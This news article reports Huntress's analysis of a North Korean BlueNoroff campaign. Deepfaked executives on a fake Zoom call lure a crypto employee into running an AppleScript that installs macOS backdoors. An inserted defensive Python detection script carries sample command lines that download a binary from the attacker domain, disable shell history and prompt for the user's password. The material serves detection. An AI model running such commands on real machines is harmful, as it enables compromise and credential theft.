Bluenoroff Deepfake Zoom Scam hits Crypto Employee using MacOS backdoor malware

By user, June 19, 2025

The North Korean threat actor known as BlueNoroff has been observed targeting employees in the Web3 sector with a Zoom call featuring deepfaked company executives, in order to install malware on Apple macOS devices.

Huntress, which disclosed details of the intrusion, said the attack targeted an employee of an unnamed cryptocurrency foundation.

“The message asked for time to talk to employees, and the attackers sent Calendly links to set meeting times,” said security researchers Alden Schmidt, Stuart Ashenbrenner and Jonathan Semon. “The Calendly link was for a Google Meet event, but when clicked, the URL redirects the end user to a fake Zoom domain controlled by the threat actor.”

A few weeks later, the employee reportedly attended a group Zoom meeting, along with other external contacts, which included several deepfakes of known members of the company’s senior leadership.

However, when the employee said they could not use their microphone, the synthetic personas urged them to download and install a Zoom extension to fix the supposed issue. The link to the extension, shared via Telegram, downloaded an AppleScript named “Zoom_sdk_support.scpt.”

This AppleScript first opens a legitimate web page for the Zoom Software Development Kit (SDK), but is configured to stealthily download the next-stage payload from a remote server (“support[.]us05web-zoom[.]biz”) and run it as a shell script.

The script starts by disabling Bash history logging, then checks whether Rosetta 2 is installed on the compromised Mac and installs it if not. Rosetta is Apple software that allows Macs running Apple Silicon to run apps built for Intel-based (x86_64) Macs.


The script then creates a hidden file called “.pwd” and downloads a binary from the malicious Zoom look-alike site (“web071zoom[.]us/fix/audio-fv/7217417464”) to “/tmp/icloud_helper.” It also makes a further request to “web071zoom[.]us/fix/audio-tr/7217417464” to fetch a second, unspecified payload.

The shell script also prompts the user for their system password, then wipes the history of executed commands to avoid leaving a forensic trail. Huntress said its investigation uncovered eight different malicious binaries on the victim’s host.
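The chain described above (Calendly link redirecting to a Zoom look-alike domain, AppleScript spawning a shell stage, Bash history disabled, Rosetta installed, a hidden “.pwd” file, a download into /tmp, a password prompt, and history wiped afterwards) is a set of behaviours a defender can match against process telemetry. The following is an added example written for this article, not code from Huntress or the publication: a small triage routine over constructed macOS process events. The event field names (pid, ppid, proc, parent, cmdline), the JSON-lines format, the sample events and the alert threshold are all assumptions; the rule patterns follow the behaviours the article names, and the look-alike domains in the sample are the ones the article reports.

```python
"""Triage macOS process telemetry for the behaviours described in the
BlueNoroff deepfake-Zoom chain. Added example; the event schema (pid, ppid,
proc, parent, cmdline) is an assumption and should be mapped to your EDR's
export format."""
import json
import re

# Legitimate Zoom domains; any other host containing "zoom" is treated as a look-alike.
ZOOM_DOMAINS = ("zoom.us", "zoom.com")

# Behavioural rules, each matched against a single process command line.
RULES = [
    ("scpt_from_downloads", re.compile(r"osascript\b.*Downloads/[^ ]*\.scpt", re.I)),
    ("history_disabled", re.compile(r"unset\s+HISTFILE|HISTFILE=/dev/null|set\s+\+o\s+history")),
    ("history_wiped", re.compile(r"history\s+-c|\.(bash|zsh)_history")),
    ("rosetta_install", re.compile(r"softwareupdate\s+--install-rosetta")),
    ("hidden_pwd_file", re.compile(r"/\.pwd\b")),
    ("tmp_download", re.compile(r"\b(curl|wget)\b.*\s/tmp/")),
    ("password_prompt", re.compile(r"display dialog.*hidden answer", re.I)),
]
URL_RX = re.compile(r"https?://([^/\s\"']+)")


def refang(host):
    """Normalise a possibly defanged host ("web071zoom[.]us") to a plain lowercase name."""
    return host.lower().replace("[.]", ".").strip(".")


def is_zoom_lookalike(host):
    """True for hosts that contain "zoom" but are not zoom.us/zoom.com or a subdomain of them."""
    host = refang(host)
    if host in ZOOM_DOMAINS or host.endswith(tuple("." + d for d in ZOOM_DOMAINS)):
        return False
    return "zoom" in host


def load_events(jsonl_text):
    """Parse JSON-lines process events (assumed export format)."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def triage_events(events):
    """Return {indicator_name: [pids]} for the events of one host."""
    hits = {}

    def add(name, pid):
        hits.setdefault(name, []).append(pid)

    for ev in events:
        cmd = ev["cmdline"]
        for name, rx in RULES:
            if rx.search(cmd):
                add(name, ev["pid"])
        for host in URL_RX.findall(cmd):
            if is_zoom_lookalike(host):
                add("zoom_lookalike_url", ev["pid"])
        # AppleScript lures hand off to a shell or a downloader; flag that parent/child pair.
        if ev.get("parent") == "osascript" and ev["proc"] in ("sh", "bash", "zsh", "curl"):
            add("osascript_spawned_shell", ev["pid"])
    return hits


def verdict(hits, threshold=3):
    """Alert when several distinct behaviours co-occur on one host (threshold is an assumption)."""
    return "suspicious" if len(hits) >= threshold else "benign"


# Constructed sample telemetry modelled on the article's description; not a real capture.
SAMPLE_EVENTS = """\
{"pid": 501, "ppid": 1, "proc": "osascript", "parent": "launchd", "cmdline": "osascript /Users/alice/Downloads/Zoom_sdk_support.scpt"}
{"pid": 502, "ppid": 501, "proc": "open", "parent": "osascript", "cmdline": "open https://developers.zoom.us/docs/"}
{"pid": 503, "ppid": 501, "proc": "bash", "parent": "osascript", "cmdline": "bash -c \\"unset HISTFILE; softwareupdate --install-rosetta --agree-to-license\\""}
{"pid": 504, "ppid": 503, "proc": "touch", "parent": "bash", "cmdline": "touch /Users/alice/.pwd"}
{"pid": 505, "ppid": 503, "proc": "curl", "parent": "bash", "cmdline": "curl -s -o /tmp/icloud_helper http://web071zoom[.]us/fix/audio-fv/7217417464"}
{"pid": 506, "ppid": 503, "proc": "osascript", "parent": "bash", "cmdline": "osascript -e 'display dialog \\"Zoom needs your password\\" default answer \\"\\" with hidden answer'"}
{"pid": 507, "ppid": 503, "proc": "bash", "parent": "bash", "cmdline": "bash -c 'history -c'"}
{"pid": 601, "ppid": 1, "proc": "zoom.us", "parent": "launchd", "cmdline": "/Applications/zoom.us.app/Contents/MacOS/zoom.us"}
"""

if __name__ == "__main__":
    found = triage_events(load_events(SAMPLE_EVENTS))
    print(json.dumps(found, indent=2))
    print("verdict:", verdict(found))
```

The legitimate Zoom client launch (pid 601) and the SDK page opened as a decoy (pid 502) produce no hits, while the rest of the chain yields nine distinct indicators; requiring several to co-occur keeps a lone Rosetta install or a single /tmp download from paging anyone.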

  • Telegram 2, a Nim-based binary responsible for launching the primary backdoor, Root Troy V4
  • Root Troy V4, a backdoor that can run remote AppleScript payloads, download and run shell commands, run additional malware, and drop a fully functional Go backdoor
  • A benign Swift application, which is in turn used to run a C++ binary loader downloaded by Root Troy V4; the operator can issue commands to it asynchronously
  • XScreen, an Objective-C keylogger with the ability to monitor the victim’s keystrokes, clipboard and screen, sending the information to the command-and-control (C2) server; and CryptoBot

BlueNoroff is a sub-cluster within the Lazarus Group, also tracked as Alluring Pisces, APT38, Black Alicanto, Copernicium, Nickel Gladstone, Stardust Chollima and TA444, and has a history of targeting ATMs and cryptocurrency businesses on behalf of North Korea.

The group is best known for orchestrating a series of cryptocurrency heists tracked as TraderTraitor, which target employees of organizations engaged in blockchain research using malicious cryptocurrency trading applications. Notable cases include the February 2025 Bybit hack and the March 2022 Axie Infinity hack.

“Remote workers, especially in high-risk fields, are often ideal targets for groups like TA444,” Huntress said. “It’s important to train employees to identify common attacks that begin with social engineering related to remote meeting software.”

According to DTEX’s latest assessment of North Korea’s cyber structure, the APT38 mission no longer exists, having split into TraderTraitor (aka Jade Sleet and UNC4899) and CryptoCore (aka CageyChameleon, CryptoMimic, Dangerous Password and Leery Turtle), which have become financially motivated operators.

“TraderTraitor appears to have been the most prolific of the DPRK APT groups when it comes to cryptocurrency theft and has been the most talented to come from the original APT38 effort,” DTEX said. “CryptoCore has been active since at least 2018 and likely split off from TraderTraitor and APT38.”

Furthermore, the use of audio-issue-themed lures to get prospective victims to infect their own machines with malware mirrors the evolution of another North Korea-linked campaign called Contagious Interview, which delivers a malware family named GolangGhost using ClickFix-style alerts.


A newer iteration called ClickFake Interview posts fake job ads and then tricks job seekers into copying and running malicious commands, under the pretext of fixing camera and microphone access issues on fake websites the threat actor has set up to host employment assessments.

According to Cisco Talos, these cross-platform attacks have evolved further with a Python version of GolangGhost, known as PylangGhost. The fake assessment sites spoof well-known financial entities such as Archblock, Coinbase, Robinhood and Uniswap, and are known to target a small set of users, mostly in India.

“In recent campaigns, Famous Chollima, a threat actor who may be made up of multiple groups, is targeting Windows systems using the Python-based version of the trojan, but continues to deploy Golang-based versions for macOS users,” Talos said. “Linux users are not targeted in these latest campaigns.”

Like its Golang counterpart, PylangGhost can establish contact with a C2 server, allowing attackers to remotely control the infected machine, download and upload files, and steal cookies and credentials from over 80 browser extensions, including password managers and cryptocurrency wallets.

“It’s not clear […] whether the threat actor decided to create two variants using different programming languages, or whether it was originally created that way,” Talos said. “The structure, naming conventions, and function names are very similar.”
